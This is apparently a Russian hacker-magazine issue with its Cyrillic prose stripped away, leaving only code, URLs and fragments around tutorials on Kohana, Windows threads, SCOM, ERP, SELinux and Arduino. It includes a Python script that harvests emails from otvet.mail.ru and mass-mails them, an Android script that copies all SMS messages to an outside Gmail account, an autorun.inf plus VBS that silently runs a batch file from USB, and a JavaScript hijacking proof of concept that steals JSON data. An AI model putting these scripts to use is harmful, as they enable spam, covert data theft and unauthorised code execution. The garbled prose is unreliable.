( , , ) .
. .
, , ,
.
.
() .
Model-View-Controller. ,
, , .
, .
,
. , , , Kohana

MVC.

MVC . ,
..

. , http://xakep.ru.
(
MVC). , .

.. .

- .
, , ,
.
.
.

MVC .
. ( ) . ,
, , .
- .
MVC .

- .
, ..

This is Kohana

Kohana . ,
, Kohana
Model View Controller.
Kohana -
PHP.
, Kohana BSD, GPL. ,


http://goo.gl/sRjoo
CodeIgniter. Kohana
. Kohana,
CodeIgniter. ,
.
http://kohanaframework.org/
Kohana. ,

.
.
http://vr-online.ru
. CMF,
CodeIgniter, Drupal
..
http://kerkness.ca/wiki/doku.php
Kohana.


, .

Kohana

DVD
dvd


.

WARNING
warning
,
MVC

.
!


.
. ,
.
Environment Tests ( ).



.
. , .
: Your environment passed all requirements. Remove or rename
the install.php file now.
,
install.php.
. ,
. , hello, world.

Hello world Kohana

, Hello world.
:
<?php defined('SYSPATH') or die('No direct script access.');
class Controller_Test extends Controller {
public function action_index()
{
$this->response->body('Hello world! Hello, everyone!!!');
}
}


Controller_Test, Controller.
. Controller ( ),
.
.
Test. App/
classes/controller App/classes/model.

, ,
. ,
. , ,
myFirstModel:
class Model_myFirstModel extends Model
{
    public function calcIt($a, $b) {
        return $a + $b;
    }
}

calcIt().
.
, ,
. ,
, Model_Database. ,
,
users.
:
class Model_myFirstDBModel extends Model_Database
{
    public function selectData() {
        // Model_Database keeps its connection in the protected $_db property
        return $this->_db->query(Database::SELECT,
            'select userName, pass from users', FALSE);
    }
}

.
, , , .
, .
views,
.
Application. .
about. :
<html>
<head>
<title><?php echo $title ?></title>
</head>
..

,
html-.
, <title>.
. ,
.

:
$about_page = View::factory('about');
$about_page -> title = ' about';
$this -> response -> body ($about_page);

about_page about. View::factory.


title .

.
web. ,
, ..
(-
:) . .), - . ,
. ,
, .
, - .
, ,
. , Dropbox?
2 ,
.
.
, .
, :
.


. , , HTML5
Drag&Drop-
FileAPI.
DropBox. public.
. Dropbox
.
. , ,
.
.

, MVC


, , ( ) .
. ,
. ,
. . , ,
( ).
. ,
, .
:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title> CMF Kohana ][</title>
<link href="style.css" rel="stylesheet" type="text/css" />

<script src="html5uploader.js"></script>
</head>
<body onload="new uploader('drop', 'status', 'uploader.php',
'list');">
<div id="box">
<div id="status"> </div>
<div id="drop"></div>
</div>
<div id="list"></div>
</body>
</html>

html5uploader. JS-
html5-
. onload uploader.
:


: ORM
1. id , ;
2. id ;
3. ,
;
4. id .
. ,
html- style.css.
. , css-,
.
, Dropbox.
. . , ,
. .
. ,
DropboxUploader.
.

upload. DropBox :
$uploader = new DropboxUploader('_',
'_');
$uploader->upload(' ', ' ');

public,
/public. ,
'/'.
:
if (count($_FILES) > 0)
{
    // basename() drops any directory components from the client-supplied name
    $name = basename($_FILES['upload']['name']);
    if (move_uploaded_file($_FILES['upload']['tmp_name'],
        $upload_folder.'/'.$name))
    {
        echo 'done';
        // Send the file to Dropbox only after it has been stored locally
        $uploader = new DropboxUploader('login', 'pass');
        $uploader->upload($upload_folder.'/'.$name, $dropbox_folder);
    }
    exit();
}
...

$_FILES. ,

sendAsBinary().
base64 ( ). .
.

web ,
.
Kohana
. Kohana . ,

php. . ,
. z

CODING
herfleisch (www.perechnev.com)

@MAIL.RU


mail.ru
( , ),
.
,
,
otvet.mail.ru.

.
, . ,
otvet.mail.ru.
-
.
, .
, ,
<ctrl+u> HTML- . , .
, ,


- mail-. :
, . ,
gedit .

Python.
. .
email- . urllib
- HTTP re
.
Python-:

INFO

info



100 .
-
,

-.

DVD

email
import urllib
import re

: web,
. :
while True:
u = urllib.urlopen("http://otvet.mail.ru/it/")
page = u.read()
emailPattern =
r"[0-9a-zA-Z_\-\.]+@[0-9a-z-A-Z\.]+.[a-zA-Z]+"
compiledPattern = re.compile(emailPattern)
for address in compiledPattern.findall(page):
# -

http://otvet.mail.ru/it/ ,
. , , email- , http://otvet.mail.ru/sport/.
emailPattern
, email-. ,

. Google

, :).

:
for address in compiledPattern.findall(page):


findall compiledPattern.
page,
. findall
email-,
http://otvet.mail.ru/it/.
, for <> in <>, , email-

, address
. ,
,
.
.
,
:
smtp_server = "smtp.mail.ru"
smtp_port = 25
smtp_address = "nickname@mail.ru"
smtp_password = "passw0rd"
mail_topic = " "
mail_body = ",
-. , ,
."


.
. -
:
import smtplib
from email.MIMEText import MIMEText

dvd


,
.

WARNING
warning



mail.
ru
.

.

forin, email:
msg = MIMEText(mail_body + address, "", "utf-8")
msg['From'] = smtp_address
msg['To'] = address
msg['Subject'] = email_topic
mailServer = smtplib.SMTP(smtp_server, smtp_port)
mailServer.login(smtp_address, smtp_password)
mailServer.sendmail(smtp_address, address,
msg.as_string())
mailServer.close()
usedEmails.append(address)


:)
: email ,
address.
. ,
.


, - .
20-25
. :
time.sleep(25)

:
import time

, .
,
. -

, 150 400 . !
http://otvet.mail.ru ,
.
19 998. 20
:).

, otvet.mail.ru
. ,
Google Yahoo , . , ,
,
email- , .
, ,
.
, - -
: ! , .
, :).
: my.mail.ru.
. , . z

CODING
Night Storm (nstorm90@gmail.com)

Scripting
Layer
for Android

SMS-
ANDROID

Scripting Layer for Android:



Android
. ,
.
Python Ruby! SL4A .

SL4A
Android. ,
: Python, Perl, JRuby, Lua, BeanShell,
JavaScript, Tcl. API,
Android,
.
,
. ,
, ,
-


. ,
. ,
alpha-,
. , ,
cellbots.com.

:
SL4A, - android-
. apk-
(. ), QR.

DVD
dvd


.

HTTP://WWW
links

QR- SL4A

:
http://code.google.com/p/android-scripting/.

, , Add Python,
py,
:
import android
droid = android.Android()

Python
,
.
.
View Interpreters.
Shell ,
unix-.
,
, Add, . apk-.
Python, .
,
. Python for Android, ,
Install,
,
. , SL4A, ,
Python.
.

Hello world!

, Hello World ,
, .
( View
Interpreters), Python.
, ,
print "Hello world" ,
.

,
exit() .

, , : , ,
droid. :
print Hello world, hello
world alert- API.
:
import android
droid = android.Android()
#
h = "hello world"
print h
# API
droid.dialogCreateAlert(h, h)
droid.dialogShow()

WARNING
warning


,

.


. DialogCreateAlert : .
makeToast (
).

-
, , ! ,
API browser,
. , , <Insert>.

. , , .

SMS-

, SMS
.


, -
# -*- coding: utf-8 -*-
import android, smtplib, os
droid = android.Android()
#
mailfrom = " "
mailto = " "
lines = ""
#
result = droid.smsGetMessages(False)
#
for f in result[1]:
for value in f.values():
lines = lines+str(value.encode('utf-8'))+ '\n'
print lines
#
mailSend = smtplib.SMTP("smtp.gmail.com",587)
mailSend.ehlo()
mailSend.starttls()
mailSend.ehlo()
mailSend.login(mailfrom," ")
mailSend.sendmail(mailfrom, mailto, lines)
mailSend.close()

, .
. mailfrom
mailto ,
, .
smsGetMessages() .
,


Python
(True), (False). ,
, : inbox (
) ,
. result ,
. ,
. result, SMS
,
result[1], ,
SMS, ID .
,
, .
API SL4A sendEmail(),
, ,
SMS . smtplib
.
.
? , ,
,
. apk-
( : http://code.google.com/p/android-scripting/wiki/
SharingScripts), , :).

, API ( )
, . ,

, ! z

CODING
deeonis (deeonis@gmail.com)

C++, . C++ ,
. Windows ,
.
,
.

.
Windows,
(, , ..),
.
, ,
-
.
.
:

//
HANDLE hWorkerThread = ::CreateThread( ... );
// -
,
...
//
DWORD dwWaitResult = ::WaitForSingleObject(
hWorkerThread, INFINITE );
if( dwWaitResult != WAIT_OBJECT_0 )
{
//
}
//
::CloseHandle( hWorkerThread );

CreateThread,
, , , , . , API- WaitForSingleObject. .

WaitForSingleObject
WaitForMultipleObjects

WaitForSingleObject
,
. , .
, , -


. : . WaitForSingleObject
, ,
, , ,
.
, API
.
WAIT_TIMEOUT. , INFINITE.
,
, .
, ,
WAIT_OBJECT_0.
WaitForSingleObject , API- WaitForMultipleObjects,
.
.
WaitForMultipleObjects
DWORD WINAPI WaitForMultipleObjects(
__in DWORD nCount,
__in const HANDLE *lpHandles,
__in BOOL bWaitAll,
__in DWORD dwMilliseconds
);

API- WaitForSingleObject ,
.
const
HANDLE *lpHandles. DWORD nCount, BOOL bWaitAll
,
.

WaitForSingleObject, , bWaitAll == FALSE,

WAIT_OBJECT_0 + object_index_in_array. ,
WAIT_OBJECT_0, , .
, , WaitFor***, , .
WaitForMultipleObjects
(Events), , , , , ,
. ,

MSDN
, .

event . , ,
,
.
CreateEvent.
CreateEvent
HANDLE WINAPI CreateEvent(
__in_opt LPSECURITY_ATTRIBUTES lpEventAttributes,
__in BOOL bManualReset,
__in BOOL bInitialState,
__in_opt LPCTSTR lpName
);

.
BOOL bManualReset
FALSE.
WaitFor***
. bManualReset == TRUE,
ResetEvent.
.

, API OpenEvent.
events .
BOOL bInitialState.
TRUE, .
Events WaitFor***-
.

(mutex) event , ,
,

. ,
, . -
mutex
WaitFor***,
.
,
. , ,
mutex, ,
WaitFor*** , ,
.
,
WaitFor*** API ,
.
ReleaseMutex. mutex
. , ReleaseMutex
,
WaitFor***.
,
,
.
Mutex
HANDLE hMutex;
void Func()
{
    ::WaitForSingleObject(hMutex, INFINITE);

    ::ReleaseMutex(hMutex);
}
DWORD WINAPI thread1(LPVOID param)
{
    ::WaitForSingleObject(hMutex, INFINITE);
    Func();
    ::ReleaseMutex(hMutex);
}
DWORD WINAPI thread2(LPVOID param)
{
    ::WaitForSingleObject(hMutex, INFINITE);
    ...
    ::ReleaseMutex(hMutex);
}
int main(...)
{
    hMutex = ::CreateMutex(NULL, FALSE, NULL);
    HANDLE hThread1 = ::CreateThread(NULL, 0, thread1, ...);
    HANDLE hThread2 = ::CreateThread(NULL, 0, thread2, ...);
}

HTTP://WWW
links
http://goo.gl/H2NLa
,
Windows,
.

thread1 WaitForSingleObject
. ,
WaitForSingleObject,
ReleaseMutex.
WaitFor*** , thread1
, . thread2, ,
.
, WaitForSingleObject
Func ,
,
.

(semaphore)
, . , ,
, semaphore . , WaitFor***-
, .
,
. semaphore API-
CreateSemaphore.


CreateSemaphore
HANDLE WINAPI CreateSemaphore(
__in_opt LPSECURITY_ATTRIBUTES lpSemaphoreAttributes,
__in LONG lInitialCount,
__in LONG lMaximumCount,
__in_opt LPCTSTR lpName
);

, ( LONG lMaximumCount)
(LONG
lInitialCount). ReleaseSemaphore ,
,
.
.

critical
section. API, WaitFor***.

.
critical section . API- InitializeCriticalSection.
,
CRITICAL_SECTION (
).
.
EnterCriticalSection CRITICAL_SECTION
, . LeaveCriticalSection
.
API , ,
. , , ,
, 100 .
, .
, EnterCriticalSection
. ,


( HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\CriticalSectionTimeout).
WINAPI EXCEPTION_POSSIBLE_DEADLOCK,
,
deadlock. , ,
null.
EnterCriticalSection TryEnterCriticalSection,
,
FALSE, critical section.
, , TRUE.
, ,
DeleteCriticalSection.

. , .
API-. API
Interlocked, :).
,
- .
.
,
. ,
,
, CPU .

Deadlock

.
, .
deadlock
DWORD WINAPI thread1(LPVOID param)
{
::WaitForSingleObject(hEventA, INFINITE);
...

::WaitForSingleObject(hEventB, INFINITE);
...
}
DWORD WINAPI thread2(LPVOID param)
{
::WaitForSingleObject(hEventB, INFINITE);
...
::WaitForSingleObject(hEventA, INFINITE);
...
}

, : A B.
,
A B, , ,
event B A. , .
,
WaitForMultipleObjects bWaitAll, TRUE,
A B .
. ,
, WaitForMultipleObjects.

,
. , ,
,
,
.

, , .
. , ,
,
, . z


SYN/ACK
grinder (grinder@tux.in.ua)

SCOM:

, . , (
) . , . , ,
.

SCOM

- Microsoft
System Center,
, . SCOM 2007 R2
(OpsMgr, System Center Operations Manager 2007 R2)
2005 (Microsoft Operations Manager).
,
,
Windows, Linux UNIX. SCOM

, . ,
, , , SQL-,
,
.
.
( System Center),
(Management Server).
,
. ,
SCOM ,
. ( RPC)

-.
, ,
10 60 . , (
) .
MS SQL Server (
7 ) (Datawarehouse, 1 ).
(Management
Group),
, workgroup
Windows. MG,
.
OpsMgr
OpsMgr, , (),
.
, PowerShell.
PS- -


. ,
System Center Central (systemcentercentral.com).
, ,
. SCOM
(Management Packs), . , , ,
(),
.
. MP
SCOM, .
MS.
MS, . , , SCOM
MS Forefront TMG, System Center Data Protection
Manager 2010 .

.
Management Packs SCOM
( systemcentercentral.com).
,
SNMP , SCOM.
, TechNet .
XML-.
, . XML
, , .
SCOM . (Reporting
Server), , .
OpsMgr
Audit Collection Services (ACS), .
SCOM ,
. SCOM 2007 R2, ,
, ,
Linux/Unix .

SCOM

, , ,
. ,
Next,

SCOM 48 Management Pack


SCOM
, .
, , ,
- , OpsMgr Win2k8 ,
(R2 2009 ).
SCOM
(, .
.) .
(CPU
2,8 , RAM 4 ) Win2k3/2k8/R2, MS
SQL Server MS SQL Server (Reporting
Services) .
Web Server (IIS). : SCOM 2007 R2
MS SQL 2008 SP2 R2, SQL
2005 SP2 SQL 2008 SP1.
. DBCreateWizard.exe, . Database
. ,
(. support.microsoft.com/
kb/2425714). , , SQL-
, clck.ru/E17g.
clck.ru/DrGM,
Prerequisite Viewer,
, , .
, ,
IIS .
, , .
PowerShell :

> Import-Module ServerManager


> Add-WindowsFeature NET-Framework-Core,Web-Metabase,Web-WMI,Web-Static-Content,Web-Default-Doc,Web-Dir-Browsing,Web-Http-Errors,Web-Asp-Net,Web-Net-Ext,Web-ISAPI-Ext,Web-ISAPI-Filter,Web-Filtering,Web-Windows-Auth,Web-Mgmt-Console -Restart

ASP.NET Ajax Extensions.


clck.ru/DwEY .
, WinXP/Vista/7.
Active
Directory ( , DNS, 2000).

Global- ,
.
, .
, OpsMgr, ,
OpsMgr .
,
. , SQL,
.
Management Server Action Account,
SDK and Config Service Account.
-. Windows , ;
- ,
.
. -


Prerecvisite Viewer
,
, . ,
,
.

(Datawarehouse Reporting Server), ACS ( ).
( 51908).

, .
, , Monitoring, Authoring, Administration,
Reporting My Workspace. .
, , My Workspace. . , .

. -
: Monitoring My Workspace ,
, .
PS ,
Get-OperationManagerCommand. ,
, :
PS> Get-managementServer
.
Monitoring Windows
Computer Operations Manager . Healthy.
.
Monitoring (alerts), , , ,
. , , ,
. Actions .
, .
. Required
Configuration Tasks -



.
, ,
.
, Active Directory, Configure Active
Directory (AD) Integration Optional Configuration.
, .

.
SCOM ( ,
..).
, Administration .

,
( ).
, ,
// ,
, , ,
.
Discovery
Wizard. , .
(Windows, Linux
), , (
).
. ( , ..),
, ,
Discovery.
(agent agentless) , , . ,
, ,
Pending Management. , ( ),
Agent Management,
.
60
, , ,
.

HTTP://WWW
links
SCOM
microsoft.com/
opsmgr.

SCOM technet.microsoft.com/opsmgr.
Microsoft,
SCOM
clck.ru/Du0j.
System
Center Central
systemcentercentral.
com.

INFO
SCOM
(Administration
Settings Heartbeat, )
,
(,
, ).
SCOM MS CEIP .
Client Monitoring Configuration,
Management
Server.

,
, ,
.
.
.
, SCOM , ,
. , . 50 ,
Administration
Management Pack.
. MP
,
,
Download Management Pack Import
Management Pack. SCOM
,
,
.
,

.
Notifications Channel,
New : email, IM, SMS .
, . , email
SMTP- .
,
New Subscriber, , (
) .
, Subscriptions. , New
. , ,
.
, .

,
. ,
.
,
, ,
:).

,
-.


SCOM,
,
.
, , . z

info


System
Center Essentials.


OpsMgr, ,
System
Center ,
,

.

WARNING
warning
SCOM 2007 R2
SQL
2008 R2, SQL
2005 SP2 SQL 2008
SP1.


SQL- clck.
ru/E17g.


SYN/ACK
(polygaev@gmail.com)

ERP
!
ERP-: , OpenSource

ERP , . . , ERP-, .


1. ERP

ERP-

.
. ERP-
, - . , 1
1:
( ),
: ,
, -
. ,
.
1: .
1 20. ,
.
.
, ERP, . ,
ERP- SAP
, , ,
,
(, ..).
, .

( $1 , $100 . $1 , $100 .),
( $500 ,
$100 $500 , $100
) , ERP.
. ERP
.
, .
, , :
ERP.
,
, -


ERP-.
, , , . ,
,
. ,
.
. ,
,
.
.

2. ERP

ERP-
, .
2009 ( 2010 ), IDS, ERP-
2.
SAP,
1C, Oracle, Microsoft
.
,
.
, , ERP-, ,
.
,
.

.
.
(. 3), .
,
, , ..

SAP


SAP, - ,
( 18 )

- ERP-
ERP-.
: SAP Business One
SAP Business All-in-One.

SAP Business All-in-One -


, 2500 . SAP
Business One -
, 100 ( ,
).


ERP- SAP
: ,
, , ,
, , , ( ), .
(www.sap.com) ,
(. 4).
, SAP

: SAP SCM , SAP SRM
.


SAP: , , ,
,
, SAP
.

Oracle


-

Oracle.
.
Oracle ,
. , .

ERP- Oracle E-Business Suite. Oracle E-Business Suite .



. 12 .



: , ,
,
, ,
,
, ,
, ,
. , : , ,
-, - ,
.

ERP Oracle
ORACLES PEOPLESOFT ENTERPRISE.
.


ERP- : ,
, ,
,
, , -


1. ERP

:
SAP:
sap.com/cis/sme/solutions/businessmanagement/comparebm/
index.epx.
Oracle:
oracle.com/ru/products/applications/ebusiness/index.html.
Microsoft
microsoft.com/rus/dynamics/default.mspx.

frontstep.ru/products/SyteLine/InforERPSyteLine.

galaktika.ru.
1C
v8.1c.ru.
TADVISER
tadviser.ru.

. , , ,
, .
, .

Oracle
Oracles JD Edwards Enterprise One.


: , , ,
, ,
, , ,
, ,
, .
.


Oracle, ,
. , ERP
,
,
.

. ,
.
SAP, -


. 2. ERP (
IDC)


.

Microsoft


- Microsoft
Microsoft Business Solution.
ERP-
Microsoft , . , .

ERP software-
. Microsoft , ERP-. Microsoft Dynamics AX
Microsoft Dynamics NAV . ,
, , Microsoft Dynamics AX
for Retail. , SAP Oracle Microsoft, , .


, Microsoft
Dynamics AX, 5.


Microsoft Dynamics NAV (.
. 6).


Microsoft
. . , Microsoft
,
SAP Oracle. .

INFOR


, , INFOR.
, Gartner ERP- Infor ERP SyteLine
.



. 3. Garthner ERP
: ,
, ..
.
, (
?), , .

: ,
, , ,
.
,
INFOR: ,
,
.


INFOR
Microsoft.
,
. , .

.
ERP , .


ERP-,
ERP.
.
,
.

ERP- ,
.



ERP- ( ).
ERP- :
(Financial Management
FM), (Human
Capital Management HCM),
(Manufacturing Management MM),

. 4. SAP Business
All-in-One .
(Project Management PM),
(Supply Chain Management SCM),
(Supplier Relationship
Management SRM), (Enterprise
Asset Management EAM), (),
(Customer
Relationship Management CRM) .
, , ERP: BI (Business
Intelligence), ,
, , ,
Excel.
:
, , , .


ERP-c
.
, ,
,
1C.

1C

1C . ,
.

. ,
: .
,
.

, 1C small-
middle-.
?


1C:
8 ( 1C). , , ,
SAP Oracle, , , Microsoft Dynamics NAV.


. 5. Microsoft Dynamics AX

1C ,
.
.

. ,
1C ,
ERP 1C .
?

Open Source

. 6. Microsoft Dynamics NAV

ERP- Open
Source-.
ERP . Open Source
.
,
-,
Open Source . .

, , ,
, ,
, ,
.
ERP-.
, Openbravo workflow . web-, Java.
, Java.

Openbravo ERP

Openbravo ERP- ,
. Open
Source-.
Openbravo Russia, .
web- .


: , ,


Openbravo , Linux Ubuntu,


Amazon Web Services.

Compiere


Compiere ERP-
. Compiere Open Source ERP-.
2008 InfoWorld Compiere Bossie
Award ERP-
.

. 7. -

ompiere : (Order Management),
(Procurement), (Material Management),
(Project Management),
(WMS Warehouse Management System),
(Manufacturing), (Cash Management),
( ),
(Performance Analysis), (Customer Relationship Management), (Work-flow Management), - (Web
Store).


Compiere : Community Edition
( ), Standard Edition, Professional Edition, Cloud
Edition ( , ,
). Community
Edition ERP- .


ERP-
, ERP.


:

, .

.

Solaris ERP


Solaris ERP ,

.
ERP.


, : ( , , ),
( ,
, , ,
, , ),
, ,
, , , , , ,

. 8. 1:

, (TASK-Manager).

, ERP-,
, ,
4-5 . , ,
:
1. . ,
ERP-.
, . , , ,
: ,
, , ,
, , .
2. .
3.
, , 7 .
4. 4-5
.
5.
.
6. . .
. , , ,
.
, ERP2.
, , :
1. , ERP-
.
2. , ,
ERP, , , , .
3. , ,
, . ,
, , . z


SYN/ACK
(execbit.ru)

SELinux:
!

SELinux ,
Linux , ,
. , , SELinux
, .
SELinux (Security-Enhanced Linux Linux )
.
Linux 2.6.0
Red Hat
Enterprise Linux 4. SELinux , Debian, OpenSUSE Ubuntu, , ,
.
SELinux- RHEL5, IBM,
EAL4 Augmented with ALC_FLR.3,
Trusted
Solaris. SELinux Linux, , ,
, ,
, , , . ,
,
, ( Fedora
SELinux ). .

UNIX , .
, (,
), -
. , -rwxr-xr-x, ,
( ) , , , ,
. ,
UNIX ,
( ) ,
(procfs sysfs). ,
. -, .

,
. , -


(cfdisk, )
, ,
,
root. ,
: /
,
.
,
(ioctl)? . -,
Linux
.
, ,
root, . ,
, FTP- 21
, root,
, root, FTP , ,
, . - ! SELinux
,
.

, , ,
,
, , .

,
, , RBAC, MCS .
, ][,
. SELinux
, . SELinux , ? :
1. () (, ..)
, ( ,
,

, SELinux).
2. -
, SELinux.
3. ,
( ),
.
4. ( ),
() , ,
. :
, initrc_t
( ,
), - Apache /usr/sbin/httpd,
httpd_exec_t. ,
SELinux, ()
, initrc_t


SELinux- unconfined_u,
,
,

,
(
SELinux).
,
:
# useradd -Z xguest_u _

,
Linux-:
# semanage login -m -S targeted -s "xguest_u" -r s0 __default__

SELinux- :
# /usr/sbin/semanage login -l


httpd_exec_t, ,
httpd_t.
Apache, httpd_t.
SELinux, ,
, , httpd_t
, httpd_sys_content_t 80 , Apache
(
). :
? , ,

.
,
( 1,5
, FTP- ). SELinux
, , ,
(, audit2allow
SELinux - audit). ,

.


RBAC

, SELinux ,
,
, (,
,
SELinux). - ,
SELinux ,
.
SELinux,
. ()
, ( ,
): ,
( , _t).
SELinux (
Linux, Linux-
SELinux- unconfined_u) ,
, ,


SELinux
semanage login -l: c SELinux
, object_r,
system_u, unconfined_u, ,
.
, ,
/, SELinux (
, ).

ps xZ: c
, ,
.
UNIX,
. ,
, ,

,
( , ).
SELinux ,
(, ). Linux-, SELinux,
,
SELinux- . ,
Fedora RHEL (
, ,
) : system_u, system_r
unconfined_u, unconfined_r.
,
, system_u ( system_r)
(, httpd_t), (),
(, httpd_exec_t).
,
. unconfined_u unconfined_r
Linux-.
(
system_u:system_r:login_t),
/ . , ,
system_u:system_r:shell_t
SELinux ( ), PAM-
pam_selinux, SELinux,
( ) unconfined_u:unconfined_r:unconfined_t. ,
SELinux , , , ,
. , ,
SELinux-
system_u , ,
,
.
, -


SELinux ,
. ,
,
,
. ,
, SELinux.
SELinux, .
1. SELinux . SELinux , .
,
- ,
-
( , ).
2. -Z . , . , :
$ id -Z
$ ps auxZ
$ ls -Z

:
$ find /etc -context '*net_conf_t'

:
# restorecon -v /usr/sbin/httpd

,
:
# matchpathcon -V /var/www/html/*

3. mv ! , ,
, ,
(,
/etc, etc_t,
/var/www/html httpd_sys_content_t).
.
mv ,
(, Apache ,
httpd_sys_content_t).
4. . Fedora RHEL man-, SELinux

semanage port -l: c


SELinux selinuxfs

. ,
httpd_selinux(8) ,
Apache, ,
.
, , SELinux
. ,

- , SELinux
. ,
, -.
SELinux /var/log/audit/audit.log. ,
,
. ,
,
. /var/log/messages,
:
# grep "SELinux is preventing" /var/log/messages
May 7 18:55:56 localhost setroubleshoot: SELinux is
preventing httpd (httpd_t) "getattr" to /var/www/
html/index.html (home_dir_t). For complete SELinux
messages. run sealert -l de7e30d6-5488-466d-a60692c9f40d316d

: SELinux
httpd_t (- Apache) /var/www/html/
index.html , (home_dir_t ,
). SELinux
sealert -l --. ,
, ,
, .
:
index.html mv,
, . .
chcon:

semanage boolean -l: c SELinux

, chcon
, restorecon,
/www default_t (
, , ).
:
# semanage fcontext -a -t httpd_sys_content_t /www
# restorecon -v /www

,
/www httpd_sys_content_t, ,
( SELinux ,
,
semanage ).
semanage
-:

INFO

info
SELinux

UNIX,

,

.

# semanage boolean -l

-
, , , -
(httpd_can_network_connect_db) ftp
(ftp_home_dir) .. ,
.
/ ,
setsebool:
# setsebool httpd_can_network_connect_db on
# setsebool httpd_can_network_connect_db off

-P,
. semanage

SELinux :

WARNING
warning
tar

,

. --selinux
.

# semanage permissive -a httpd_t


# chcon -t httpd_sys_content_t \
/var/www/html/index.html


:
# restorecon -v /var/www/html

Apache ok.
,
Apache (, /www).

:
# semanage permissive -d httpd_t

SELinux , .
,
,
. z


PHREAKING
id (mk90.ru)

Shield- Arduino
Arduino ,
Open Hardware ,
.
:

.
?


$30. ATMEL USB-,
.
.
Arduino ( ) Wiring. , C++, digitalWrite (
) analogRead ( ).
- ,
C++.
Arduino USB ArduinoIDE
(arduino.cc/en/Main/Software).
- ,
ATMEL .
,
-. , , ,
.

, , ,
. , ,
.
, .
, .
- .

Shield-?

Shield- ,
.
,


Ethernet, . Arduino,
.
, ,
Arduino.
,
(shieldlist.org).

-. : ,
. -
- .
?
, .
, Arduino

. Arduino Mega Arduino
ATmega1280 ATmega2560, ,
, Uno Duemilanova. -
, Mega SPI
! Arduino SPI,

Mega , ,
- 23.
Shield- .

,
Motorshield,


Arduino Uno
aka ladyada (ladyada.net/make/mshield/).
, ,
-. : , . H- L293D, 600
4,5 36 .
, 1,2 .
, ,
, .
Ardumoto L298 Sparkfun
( 2 )
Monster Moto Shield (sparkfun.com/products/10182)
VNH2SP30, 30 41 . , : -
,
, .



Mega

Ethernet

Ethernet
ENC28J60 Microchip
W5100 Wiznet.
SPI, Arduino.
ENC28J60 W5100: 10 /, IP, UDP,
TCP. , W5100
( ).
, W5100,
(SRAM), ( Atmega328 ). : W5100
TCP ,
Atmeg .
Arduino Ethernet
Shield (arduino.cc/en/Main/ArduinoEthernetShield)
Arduino. , :
IP- DHCP;
NTP;
DNS;
RADIUS;

Motorshield Ladyada
Web-
Web-,
.
Freetronics
EthernetShield with PoE (freetronics.com/products/ethernet-shieldwith-poe). Ethernet-
Ethernet, , 2001 ,
IEEE
802.3af. ,
, Ethernet
100
. ,
PoE
SD- .


PHREAKING

Freeduino EtherSD shield Ethernet 10/100 microSD


, TCP/
IP. ,
- .
-,
Arduino+Ethernet .
EthernetShield , , ,
, -
. ,
30 Arduino Duemilanova
Mega 2560,
.

SD-

, -
(, GPS-),
. ,
SD-. .
microSD module, Libellium,
(goo.gl/iHCy4).
Arduino
SD SDHC-, FAT16 () FAT32.
, .

RF- (ASK),
433 313
Arduino VirtualWire,
.
,
,



. , -
.

Xbee, Zigbee,

.
,
Arduino.
Xbee Shield, , Libellium
Communication Shield (goo.gl/OZDxl). ,
Xbee. , ,
Xbee. 250
/, 90
( Xbee PRO 1,2 ), ,
( ).
, , - WiFi,
Bluetooth.
WiFly Shield SparkFun (sparkfun.com/products/9954) Bluetooth
module Libellium (cooking-hacks.com/index.php/arduinobluetooth-module-89.html). Xbee
Xbee, Arduino
AT-. ,
Arduino BT (arduino.cc/en/Main/ArduinoBoardBluetooth), USB-,

Bluetooth.
, .
GSM ,
TTL.
USB,
( , Arduino). , ,
GSM-,

WiFly- Sparkfun

microSD- Libellium

GPRS Quadband module for Arduino Libellium
(goo.gl/KueFH), GPRS- SAGEM.
GPRS- ,
.

,
.
, .
: Radiation Sensor Board Libellium ( ).
, , .
Seeeduino Stalker
Arduino- , ,
.
USB Host Shield Arduino ,
.
, TFT-
. LoL-Shield.
, .
Atmega (0, 1 ). 126 ,
914,
Arduino,
, , - Space Invaders.
,

LoL Shield
, , .
, .

LCD-.
- 1602 HD44780 .
Arduino:
!
( ,
ArduinoIDE,
LiquidCrystal).
,
. , Arduino. , 2,54 , (
,
PLS).
,
.
, . !
,


PHREAKING

- HD44780

...
. 10-20 ,

analog0, .
PLS
, .
, ,
Arduino ,
.
.
Arduino
- LiquidCrystal.
? ? ,
, -
!


!
.
.
, UTF-8 . github.com/mk90. z

UNITS
Step (twitter.com/stepah)

faq
united?

faq@real.xakep.ru

Q:
SIP-GSM-?
Oktell SIP-GSM Gateway (www.
A: telsystems.ru/gateways), ,

3G- .
,

ZTE Huawei. ,
, Huawei e1550,
GSM.
, 3G-
,

.

, .
,

. ,
, ,
.
,
SIP-GSM-?

SIP-,

SIP- (asterisk, oktell, sipnet ..).
GSM-SIP-.



3G-.
:
Huawei E1550, Huawei E160g, ZTE MF180.
, , : VoIP-GSM
. :
$300 (, ,
700-800 , ). ,
.
bit.ly/aNNQTD.

,
.
, ,
. , ,
iPhone/
iPad, Objective-C - .

Q: - bat- ?
A: , ,
Microsoft ,
.
:
1. myfile.vbs :

Q: Adobe Flash SWF- iOS-.


, Apple
, iPhone/
iPad . ,


?
A: -

2. autorun.inf :

, iOS,
:
, ,

,
,
USB-.

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "cmd.exe /c [_BAT_]", 0, false

[AutoRun]
UseAutoPlay=1
open=myfile.vbs


GSM-VoIP
3G-
Q: ,
.
,
SSL-. .
SSL- ?
- ?
A: SSL-,
,
. , ( 30 90
). - www.freessl.su.
,
SSL-. ,
,

:
Your Name:
Example: John Smith
Your E-mail:
Example: test@example.com
Phone:
Example: 8(495)2295670
Select the server software used to
generate the CSR:
Example: Apache-SSL
CSR:
Example:


CSR (Certificate Signing Request).

,
(Public Key).

GD GUI
Android
openssl (www.freessl.su/articles/13).
mod_ssl
Apache (, ).

www.freessl.su/articles/14.

Q: ,
JavaScript hijacking?
A:
- (oxdef.info).
(
- bit.ly/jOMIpv) - .
, -
JSONP.
,
JavaScript
.
, - JSON- -
:
[{"foo":"private data"}]

JS-,
. ,
foo ,
:
<script>
Object.prototype.__defineSetter__("foo", function(x) {
    var s = "";
    for (var f in this) {
        s += f + ": " + this[f] + ", ";
    }
    s += "foo: " + x;
    // s
    //
    //
});
</script>
<script src="http://target.com/private/data.js"></script>

JSONP, ,
:

,

. :
evilFunction({"paper": "A4", "count": 5})

, ,
.

Q:
, , .
?
A: - ExtJS (www.sencha.com),
-,
. , , ,
,
,
. ExtJS ,
JavaScript
. , , , .

Q: ,

?
A: Google

,
6- . jQuery,
JS-, ,
(jquery.thewikies.com/browser). .

